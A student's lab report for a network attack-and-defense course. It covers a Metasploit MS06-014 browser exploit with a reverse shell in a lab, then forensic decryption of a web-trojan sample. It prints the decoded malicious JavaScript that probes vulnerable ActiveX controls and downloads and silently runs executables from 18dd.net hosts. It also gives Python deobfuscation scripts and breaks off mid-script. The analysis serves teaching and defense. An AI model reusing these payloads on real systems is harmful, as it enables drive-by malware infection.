20251914 2025-2026-2 《网络攻防实践》实践十一报告
20251914 2025-2026-2 《网络攻防实践》实践十一报告
- 20251914 2025-2026-2 《网络攻防实践》实践十一报告
- 1.实践内容
- 2.实践过程
- 2.1 web浏览器渗透攻击
- 2.1.1 使用命令
msfconsole来打开metasploit软件 - 2.1.2 使用命令
search MS06-014来查找相应模块 - 2.1.3 使用use 0使用该模块,再用
show payloads选择攻击载荷 - 2.1.4 使用命令
set payload generic/shell_reverse_tcp来选择generic/shell_reverse_tcp作为攻击载荷 - 2.1.5 使用
set RHOST 192.168.232.132配置靶机,命令set LHOST 192.168.232.132配置攻击机 - 2.1.6 使用命令
exploit,得到一个网站http://192.168.232.132:8080/wsC8HXBzRSKqo - 2.1.7 在靶机的浏览器中打开该链接
- 2.1.8 打开攻击机可以看到在攻击机和靶机之间建立了一个远程shell
- 2.1.9 输入sessions命令查看二者之间的会话
- 2.1.10 输入sessions -i 1进入该会话,使用ipconfig操纵靶机
- 2.1.1 使用命令
- 2.2 取证分析实践—网页木马攻击场景分析
- 2.2.1 用Mousepad打开start.html,选择gbk格式,直接在start.html里搜索new09.htm,发现它引用了new09.htm
- 2.2.2 在学习通资料中找不到new09.htm,查找视频资料,猜测new09.htm的内容如下
- 2.2.3 为了在实验给出的 hashed 文件夹中找到对应文件,需要先计算 URL 的 MD5 值。
- 2.2.4 打开7f60672dcd6b5e90b6772545ee219bd3文件,在倒数第三行发现XXTEA+Base64的加密方法
- 2.2.5 xxtea_decrypt函数的第二个参数就是密钥,但是这个密钥被十六进制加密了,放到网站解密后,答案是script
- 2.2.6 用script作为密钥对kl.htm中的第32行进行xxtea解密
- 2.2.7 观察可看出解密后的部分是JavaScript 字符串转义的,用python脚本进行解密
- 2.2.8 分析脚本
- 2.2.9 如果检测到 Adodb.Stream 相关条件满足,脚本会加载 1.js
- 2.2.10 打开对应的文件5d7e9058a857aa2abee820d5473c5fa4,用python脚本逆转义里面的内容
- 2.2.11 http://aa.18dd.net/aa/b.js的md5加密是3870c28cc279d457746b3796a262f166
- 2.2.12 分析 5f0b8bf0385314dbe0e5ec95e6abedc2 文件
- 2.2.13 http://down.18dd.net/bb/bd.cab的md5加密是1c1d7b3539a617517c49eee4120783b2
- 2.2.14 将这些文件md5后计算散列,发现都是一样的,所以只需要分析一个文件
- 2.2.15 选择bd.exe打开
- 2.3 攻防对抗实践—web浏览器渗透攻击攻防
- 2.1 web浏览器渗透攻击
- 3.学习中遇到的问题及解决
- 4.实践总结
1.实践内容
本次借助Metasploit选用MS06-014漏洞模块搭配远程Shell载荷,配置相关参数生成恶意网页,靶机浏览器访问链接后被成功拿下权限,借此直观掌握了基于浏览器漏洞的网页挂马及远程控制攻击机理。
网页木马取证从起始网页逐步挖掘隐藏文件地址,将路径计算小写32位MD5值后按哈希命名下载文件,脚本文件持续拆解解密,二进制文件结合反汇编与动态调试,循序渐进完成整套恶意样本溯源分析。
攻防对抗环节攻击方编译两类不同浏览器漏洞利用代码并做混淆加密,伪装链接依托邮件实施钓鱼,防守方拆解混淆内容还原原始攻击代码,精准识别漏洞对应的浏览器版本,深化了漏洞攻防与恶意代码分析能力。
2.实践过程
ip地址为
| 虚拟机 | IP 地址 |
|---|---|
| Kali | 192.168.232.132 |
| Windows2k | 192.168.232.132 |
2.1 web浏览器渗透攻击
2.1.1 使用命令msfconsole来打开metasploit软件
2.1.2 使用命令search MS06-014来查找相应模块
2.1.3 使用use 0使用该模块,再用show payloads选择攻击载荷
2.1.4 使用命令set payload generic/shell_reverse_tcp来选择generic/shell_reverse_tcp作为攻击载荷
2.1.5 使用set RHOST 192.168.232.132配置靶机,命令set LHOST 192.168.232.132配置攻击机
2.1.6 使用命令exploit,得到一个网站http://192.168.232.132:8080/wsC8HXBzRSKqo
2.1.7 在靶机的浏览器中打开该链接
2.1.8 打开攻击机可以看到在攻击机和靶机之间建立了一个远程shell
2.1.9 输入sessions命令查看二者之间的会话
2.1.10 输入sessions -i 1进入该会话,使用ipconfig操纵靶机
2.2 取证分析实践—网页木马攻击场景分析
2.2.1 用Mousepad打开start.html,选择gbk格式,直接在start.html里搜索new09.htm,发现它引用了new09.htm
2.2.2 在学习通资料中找不到new09.htm,查找视频资料,猜测new09.htm的内容如下
`
`
在其中可以看到它引用了两个外部资源:http://aa.18dd.net/aa/kl.htm 和 http://js.users.51.la/1299644.js 。
其中 kl.htm 更值得重点分析。
因为它位于可疑域名 aa.18dd.net 下,并且是通过隐藏页面加载的,很可能负责后续漏洞利用或恶意代码执行。
2.2.3 为了在实验给出的 hashed 文件夹中找到对应文件,需要先计算 URL 的 MD5 值。
实验材料中的网页和脚本不是直接用原文件名保存的,而是用 URL 的 MD5 值作为文件名保存。
对 http://aa.18dd.net/aa/kl.htm 计算 MD5,得到:
7f60672dcd6b5e90b6772545ee219bd3。
因此,在 hashed 文件夹中打开这个同名文件,就相当于打开原来的 kl.htm
2.2.4 打开7f60672dcd6b5e90b6772545ee219bd3文件,在倒数第三行发现XXTEA+Base64的加密方法
2.2.5 xxtea_decrypt函数的第二个参数就是密钥,但是这个密钥被十六进制加密了,放到网站解密后,答案是script
2.2.6 用script作为密钥对kl.htm中的第32行进行xxtea解密
解密前:
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
解密后:
<script> eval("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x69\x6e\x69\x74\x28\x29\x7b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x29\x3b\x7d\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x6c\x6f\x61\x64\x20\x3d\x20\x69\x6e\x69\x74\x3b\x0d\x0a\x69\x66\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x65\x3b\x0d\x0a\x76\x61\x72\x20\x61\x64\x6f\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22\x6f\x62\x6a\x65\x63\x74\x22\x29\x29\x3b\x0d\x0a\x61\x64\x6f\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x63\x6c\x61\x73\x73\x69\x64\x22\x2c\x22\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x22\x29\x3b\x0d\x0a\x76\x61\x72\x20\x61\x73\x3d\x61\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d\x22\x2c\x22\x22\x29\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x0d\x0a\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x0d\x0a\x65\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74\x54\x69\x6d\x65\x28\x29\x2b\x32\x34\x2a\x36\x30\x2a\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27\x63\x65\x3d\x77\x69\x6e\x64\x6f\x77\x73\x78\x70\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x0d\x0a\x69\x66\x28\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x31\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x0d\x0a\x65\x6c\x73\x65\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x66\x3b\x76\x61\x72\x20\x73\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x66\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x62\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x67\x3b\x76\x61\x72\x20\x70\x70\x73\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x67\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x67\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x70\x70\x73\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x3b\x76\x61\x72\x20\x6f\x62\x6a\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x68\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x6f\x62\x6a\x2e\x44\x6c\x6f\x61\x64\x44\x53\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x64\x6f\x77\x6e\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x2f\x62\x62\x2f\x62\x64\x2e\x63\x61\x62\x22\x2c\x20\x22\x62\x64\x2e\x65\x78\x65\x22\x2c\x20\x30\x29\x7d\x7d\x0d\x0a\x7d\x7d\x7d") </script>
2.2.7 观察可看出解密后的部分是JavaScript 字符串转义的,用python脚本进行解密
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
2.2.8 分析脚本
这段脚本的主要功能是检测靶机浏览器中是否存在某些有漏洞的 ActiveX 控件。脚本会尝试检测 Adodb.Stream、暴风影音、PPStream、百度搜霸等组件。
这些组件如果版本较旧或存在漏洞,就可能被恶意网页调用,从而下载并运行木马程序。
2.2.9 如果检测到 Adodb.Stream 相关条件满足,脚本会加载 1.js
MD5(http://aa.18dd.net/aa/1.js)=5d7e9058a857aa2abee820d5473c5fa4
2.2.10 打开对应的文件5d7e9058a857aa2abee820d5473c5fa4,用python脚本逆转义里面的内容
得到的结果如下
var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open
("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close
();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}
这段脚本从 http://down.18dd.net/bb/014.exe 下载一个可执行文件。
然后把它保存成 ..\ntuser.com,并用 cmd.exe 静默执行。
2.2.11 http://aa.18dd.net/aa/b.js的md5加密是3870c28cc279d457746b3796a262f166
发现其使用 eval(function(p,a,c,k,e,d){...}) 形式进行 packed 混淆。
通过脚本自动解析 p、a、c、k 参数并按替换表还原代码,得到可读 JavaScript。
还原后发现脚本构造 shellcode,并调用 storm.rawParse(buffer) 触发暴风影音相关漏洞。
继续对 shellcode 中的 %u 编码进行解码,提取到下载地址 http://down.18dd.net/bb/bf.exe 。
#!/usr/bin/env python3
import re
import sys
import pathlib
from urllib.parse import unquote
path = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else '/home/kali/Desktop/hashed/3870c28cc279d457746b3796a262f166')
text = path.read_text(errors='ignore')
# Match Dean-Edwards style packer used by this sample:
# eval(function(p,a,c,k,e,d){...}('payload',10,196,'sym|tab|...'.split('|'),0,{}))
m = re.search(r"\}\('(?P<p>.*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*'(?P<k>.*)'\.split\('\|'\)", text, re.S)
if not m:
raise SystemExit('packer arguments not found')
payload = m.group('p')
base = int(m.group('a'))
count = int(m.group('c'))
words = m.group('k').split('|')
# This sample's encoder is e=function(c){return c}, so tokens are decimal numbers.
unpacked = payload
for i in range(count - 1, -1, -1):
if i < len(words) and words[i]:
unpacked = re.sub(r'\b{}\b'.format(re.escape(str(i))), words[i], unpacked)
out = path.with_name(path.name + '.unpacked.js')
out.write_text(unpacked, encoding='utf-8', errors='ignore')
# Extract ordinary URLs and URLs hidden as %xx / %uXXXX shellcode.
urls = set(re.findall(r'https?://[^"\'\s<>]+', unpacked))
# Decode percent-encoded chunks such as %68%74%74%70 and %u7468%u7074.
def decode_percent_u(s):
data = bytearray()
i = 0
while i < len(s):
if s.startswith('%u', i) and i + 6 <= len(s) and re.match(r'[0-9a-fA-F]{4}', s[i+2:i+6]):
val = int(s[i+2:i+6], 16)
data += val.to_bytes(2, 'little')
i += 6
elif s.startswith('%', i) and i + 3 <= len(s) and re.match(r'[0-9a-fA-F]{2}', s[i+1:i+3]):
data.append(int(s[i+1:i+3], 16))
i += 3
else:
data += s[i].encode('latin1', errors='ignore')
i += 1
return data
# Analyze unescape(...) arguments, including concatenated strings such as
# unescape("%u...." + "%u....").
shell_dump_parts = []
for expr in re.findall(r'unescape\((.*?)\)', unpacked, re.S):
pieces = re.findall(r'["\']([^"\']*)["\']', expr, re.S)
if not pieces:
continue
q = ''.join(pieces)
raw = decode_percent_u(q)
shell_dump_parts.append(raw)
for enc in ('latin1', 'utf-16le', 'ascii'):
try:
decoded = raw.decode(enc, errors='ignore')
except Exception:
continue
for u in re.findall(r'https?://[^\x00\s"\'<>]+', decoded):
urls.add(u)
shell_path = path.with_name(path.name + '.shellcode.bin')
shell_path.write_bytes(b''.join(shell_dump_parts))
print('input:', path)
print('base/count:', base, count)
print('word-table:', len(words))
print('unpacked:', out, out.stat().st_size, 'bytes')
print('shellcode-bin:', shell_path, shell_path.stat().st_size, 'bytes')
print('urls:')
for u in sorted(urls):
print(' ' + u)
print('\n--- unpacked head ---')
for n, line in enumerate(unpacked.splitlines()[:80], 1):
print('{:02d}: {}'.format(n, line[:220]))
2.2.12 分析 5f0b8bf0385314dbe0e5ec95e6abedc2 文件
发现其使用 eval("\xxx") 形式进行八进制转义混淆。
通过脚本对八进制转义内容进行还原,得到可读 JavaScript 代码。
还原后的代码创建了 classid 为 5EC7C511-CD0F-42E6-830C-1BD9882F3458 的 ActiveX 对象,并构造 shellcode。
继续对 shellcode 中的 %u 编码进行解码,提取到下载地址 http://down.18dd.net/bb/pps.exe 。
用到的脚本如下
#!/usr/bin/env python3
import re
import sys
import pathlib
from urllib.parse import unquote
path = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else '/home/kali/Desktop/hashed/3870c28cc279d457746b3796a262f166')
text = path.read_text(errors='ignore')
# Match Dean-Edwards style packer used by this sample:
